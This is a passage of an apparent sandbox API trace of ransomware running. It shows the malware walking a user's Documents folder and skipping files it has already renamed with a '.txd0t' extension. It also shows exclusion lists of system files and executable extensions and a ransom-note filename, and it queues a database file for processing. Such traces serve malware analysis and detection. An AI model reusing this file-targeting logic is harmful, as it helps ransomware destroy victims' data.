StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.098] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.098] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="4oSJqKCx.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\4oSJqKCx.docx.txd0t" [0090.098] PathFindExtensionW (pszPath="4oSJqKCx.docx.txd0t") returned=".txd0t" [0090.098] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.098] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31841f70, ftCreationTime.dwHighDateTime=0x1d5e5a3, ftLastAccessTime.dwLowDateTime=0xc216dad0, ftLastAccessTime.dwHighDateTime=0x1d5e497, ftLastWriteTime.dwLowDateTime=0x51332989, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6042, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="6IKlp7h.ppt.txd0t", cAlternateFileName="6IKLP7~1.TXD")) returned 1 [0090.098] StrCmpW (psz1="6IKlp7h.ppt.txd0t", psz2=".") returned 1 [0090.098] StrCmpW (psz1="6IKlp7h.ppt.txd0t", psz2="..") returned 1 [0090.098] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.098] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.098] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="6IKlp7h.ppt.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\6IKlp7h.ppt.txd0t" [0090.098] PathFindExtensionW (pszPath="6IKlp7h.ppt.txd0t") returned=".txd0t" [0090.098] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.098] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528b4870, ftCreationTime.dwHighDateTime=0x1d5e1ce, ftLastAccessTime.dwLowDateTime=0xad54a8d0, ftLastAccessTime.dwHighDateTime=0x1d5ed79, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13841, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", cAlternateFileName="7D9VJ0~1.TXD")) returned 1 [0090.098] StrCmpW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", psz2=".") returned 1 [0090.098] StrCmpW (psz1="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", psz2="..") returned 1 [0090.098] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.098] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.098] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t" [0090.098] PathFindExtensionW (pszPath="7d9vJ0y5f9LLSOKq2PHP.ppt.txd0t") returned=".txd0t" [0090.098] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.098] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b06ef30, ftCreationTime.dwHighDateTime=0x1d5b702, ftLastAccessTime.dwLowDateTime=0xf6036630, ftLastAccessTime.dwHighDateTime=0x1d5b939, ftLastWriteTime.dwLowDateTime=0x5137ec48, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5c15, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", cAlternateFileName="82F_2P~1.TXD")) returned 1 [0090.098] StrCmpW (psz1="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", psz2=".") returned 1 [0090.098] StrCmpW (psz1="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", psz2="..") returned 1 [0090.098] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.098] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.098] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="82f_2PILY3Rkg8CydxKr.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\82f_2PILY3Rkg8CydxKr.xlsx.txd0t" [0090.098] PathFindExtensionW (pszPath="82f_2PILY3Rkg8CydxKr.xlsx.txd0t") returned=".txd0t" [0090.098] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.098] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979d05c0, ftCreationTime.dwHighDateTime=0x1d566bd, ftLastAccessTime.dwLowDateTime=0x55372160, ftLastAccessTime.dwHighDateTime=0x1d5a7a0, ftLastWriteTime.dwLowDateTime=0x513a4d8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17cd1, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", cAlternateFileName="9H_SL9~1.TXD")) returned 1 [0090.099] StrCmpW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", psz2=".") returned 1 [0090.099] StrCmpW (psz1="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", psz2="..") returned 1 [0090.099] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\9H_Sl92NVVWuSvdwZJYh.pptx.txd0t" [0090.099] PathFindExtensionW (pszPath="9H_Sl92NVVWuSvdwZJYh.pptx.txd0t") returned=".txd0t" [0090.099] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.099] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee80daf0, ftCreationTime.dwHighDateTime=0x1d5eda0, ftLastAccessTime.dwLowDateTime=0x640a9100, ftLastAccessTime.dwHighDateTime=0x1d5c2de, ftLastWriteTime.dwLowDateTime=0x513cafee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1c20, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="aayLh9Av.xlsx.txd0t", cAlternateFileName="AAYLH9~1.TXD")) returned 1 [0090.099] StrCmpW (psz1="aayLh9Av.xlsx.txd0t", psz2=".") returned 1 [0090.099] StrCmpW (psz1="aayLh9Av.xlsx.txd0t", psz2="..") returned 1 [0090.099] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="aayLh9Av.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\aayLh9Av.xlsx.txd0t" [0090.099] PathFindExtensionW (pszPath="aayLh9Av.xlsx.txd0t") returned=".txd0t" [0090.099] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.099] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52c4d210, ftCreationTime.dwHighDateTime=0x1d5e83c, ftLastAccessTime.dwLowDateTime=0xe5260e00, ftLastAccessTime.dwHighDateTime=0x1d5ef56, ftLastWriteTime.dwLowDateTime=0x513cafee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1865f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="chS1ef v8z.odp.txd0t", cAlternateFileName="CHS1EF~1.TXD")) returned 1 [0090.099] StrCmpW (psz1="chS1ef v8z.odp.txd0t", psz2=".") returned 1 [0090.099] StrCmpW (psz1="chS1ef v8z.odp.txd0t", psz2="..") returned 1 [0090.099] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="chS1ef v8z.odp.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\chS1ef v8z.odp.txd0t" [0090.099] PathFindExtensionW (pszPath="chS1ef v8z.odp.txd0t") returned=".txd0t" [0090.099] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.099] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x186cbfe0, ftCreationTime.dwHighDateTime=0x1d5cf93, ftLastAccessTime.dwLowDateTime=0x85968cb0, ftLastAccessTime.dwHighDateTime=0x1d5f025, ftLastWriteTime.dwLowDateTime=0x513f144c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x180c9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="CsjFe8d.pptx.txd0t", cAlternateFileName="CSJFE8~1.TXD")) returned 1 [0090.099] StrCmpW (psz1="CsjFe8d.pptx.txd0t", psz2=".") returned 1 [0090.099] StrCmpW (psz1="CsjFe8d.pptx.txd0t", psz2="..") returned 1 [0090.099] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="CsjFe8d.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\CsjFe8d.pptx.txd0t" [0090.099] PathFindExtensionW (pszPath="CsjFe8d.pptx.txd0t") returned=".txd0t" [0090.099] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.099] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 1 [0090.099] StrCmpW (psz1="Database1.accdb", psz2=".") returned 1 [0090.099] StrCmpW (psz1="Database1.accdb", psz2="..") returned 1 [0090.100] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.100] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.100] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Database1.accdb", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Database1.accdb") returned="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" [0090.100] PathFindExtensionW (pszPath="Database1.accdb") returned=".accdb" [0090.100] StrCmpW (psz1=".accdb", psz2=".txd0t") returned -1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="bootsect.bak") returned 1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="iconcache.db") returned -1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="thumbs.db") returned -1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2=" ransomware ") returned 1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2=" ransom ") returned 1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="debug.txt") returned -1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="boot.ini") returned 1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="desktop.ini") returned -1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="autorun.inf") returned 1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="ntuser.dat") returned -1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="ntldr") returned -1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="ntdetect.com") returned -1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="bootfont.bin") returned 1 [0090.100] StrCmpIW (psz1="Database1.accdb", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.100] PathFindExtensionW (pszPath="Database1.accdb") returned=".accdb" [0090.100] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".accdb") returned 0x0 [0090.100] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0090.100] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0090.100] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb" [0090.100] SetEvent (hEvent=0x3fc) returned 1 [0090.106] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440c5760, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440c5760, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce494f1d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.106] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.106] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.106] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbebfca0, ftCreationTime.dwHighDateTime=0x1d5eb4c, ftLastAccessTime.dwLowDateTime=0x694d61f0, ftLastAccessTime.dwHighDateTime=0x1d5ef0d, ftLastWriteTime.dwLowDateTime=0x5141784d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x225b, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="dMMktGSdsuA8JTH.docx.txd0t", cAlternateFileName="DMMKTG~1.TXD")) returned 1 [0090.106] StrCmpW (psz1="dMMktGSdsuA8JTH.docx.txd0t", psz2=".") returned 1 [0090.106] StrCmpW (psz1="dMMktGSdsuA8JTH.docx.txd0t", psz2="..") returned 1 [0090.106] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.107] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.107] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="dMMktGSdsuA8JTH.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\dMMktGSdsuA8JTH.docx.txd0t" [0090.107] PathFindExtensionW (pszPath="dMMktGSdsuA8JTH.docx.txd0t") returned=".txd0t" [0090.107] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.107] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe473dc0, ftCreationTime.dwHighDateTime=0x1d56dd1, ftLastAccessTime.dwLowDateTime=0xc7450bc0, ftLastAccessTime.dwHighDateTime=0x1d59b69, ftLastWriteTime.dwLowDateTime=0x5141784d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x130b9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="gaAE08.xlsx.txd0t", cAlternateFileName="GAAE08~1.TXD")) returned 1 [0090.107] StrCmpW (psz1="gaAE08.xlsx.txd0t", psz2=".") returned 1 [0090.107] StrCmpW (psz1="gaAE08.xlsx.txd0t", psz2="..") returned 1 [0090.107] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.107] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.107] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="gaAE08.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\gaAE08.xlsx.txd0t" [0090.107] PathFindExtensionW (pszPath="gaAE08.xlsx.txd0t") returned=".txd0t" [0090.107] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.107] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1b030, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0x5fc14230, ftLastAccessTime.dwHighDateTime=0x1d57ebc, ftLastWriteTime.dwLowDateTime=0x51464c25, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xb98c, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="lLleeaH.xlsx.txd0t", cAlternateFileName="LLLEEA~1.TXD")) returned 1 [0090.107] StrCmpW (psz1="lLleeaH.xlsx.txd0t", psz2=".") returned 1 [0090.107] StrCmpW (psz1="lLleeaH.xlsx.txd0t", psz2="..") returned 1 [0090.107] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.107] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.107] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="lLleeaH.xlsx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\lLleeaH.xlsx.txd0t" [0090.107] PathFindExtensionW (pszPath="lLleeaH.xlsx.txd0t") returned=".txd0t" [0090.107] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.107] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8c878c0, ftCreationTime.dwHighDateTime=0x1d58b7c, ftLastAccessTime.dwLowDateTime=0x53d3ce0, ftLastAccessTime.dwHighDateTime=0x1d58e68, ftLastWriteTime.dwLowDateTime=0x51465f56, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18f22, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="lzf-_9_.pptx.txd0t", cAlternateFileName="LZF-_9~1.TXD")) returned 1 [0090.107] StrCmpW (psz1="lzf-_9_.pptx.txd0t", psz2=".") returned 1 [0090.107] StrCmpW (psz1="lzf-_9_.pptx.txd0t", psz2="..") returned 1 [0090.107] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.107] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.107] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="lzf-_9_.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\lzf-_9_.pptx.txd0t" [0090.107] PathFindExtensionW (pszPath="lzf-_9_.pptx.txd0t") returned=".txd0t" [0090.107] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.107] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x487438f0, ftCreationTime.dwHighDateTime=0x1d5e12a, ftLastAccessTime.dwLowDateTime=0x3a657ae0, ftLastAccessTime.dwHighDateTime=0x1d5e593, ftLastWriteTime.dwLowDateTime=0x51470edd, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x708e, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Md5Q.odt.txd0t", cAlternateFileName="MD5QOD~1.TXD")) returned 1 [0090.107] StrCmpW (psz1="Md5Q.odt.txd0t", psz2=".") returned 1 [0090.107] StrCmpW (psz1="Md5Q.odt.txd0t", psz2="..") returned 1 [0090.107] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.108] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.108] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Md5Q.odt.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Md5Q.odt.txd0t" [0090.108] PathFindExtensionW (pszPath="Md5Q.odt.txd0t") returned=".txd0t" [0090.108] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.108] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e36670, ftCreationTime.dwHighDateTime=0x1d5cdf0, ftLastAccessTime.dwLowDateTime=0xda2c03d0, ftLastAccessTime.dwHighDateTime=0x1d59bf8, ftLastWriteTime.dwLowDateTime=0x51611625, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16bb6, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="mDGOSIz_qds.docx.txd0t", cAlternateFileName="MDGOSI~1.TXD")) returned 1 [0090.108] StrCmpW (psz1="mDGOSIz_qds.docx.txd0t", psz2=".") returned 1 [0090.108] StrCmpW (psz1="mDGOSIz_qds.docx.txd0t", psz2="..") returned 1 [0090.108] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0090.108] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0090.108] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="mDGOSIz_qds.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\mDGOSIz_qds.docx.txd0t" [0090.108] PathFindExtensionW (pszPath="mDGOSIz_qds.docx.txd0t") returned=".txd0t" [0090.108] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.108] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1200a910, ftCreationTime.dwHighDateTime=0x1d587f8, ftLastAccessTime.dwLowDateTime=0xc9923070, ftLastAccessTime.dwHighDateTime=0x1d5e762, ftLastWriteTime.dwLowDateTime=0x5163795f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x63d9, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="MRcnfzewVmw.docx.txd0t", cAlternateFileName="MRCNFZ~1.TXD")) returned 1 [0090.108] StrCmpW (psz1="MRcnfzewVmw.docx.txd0t", psz2=".") returned 1 [0090.108] 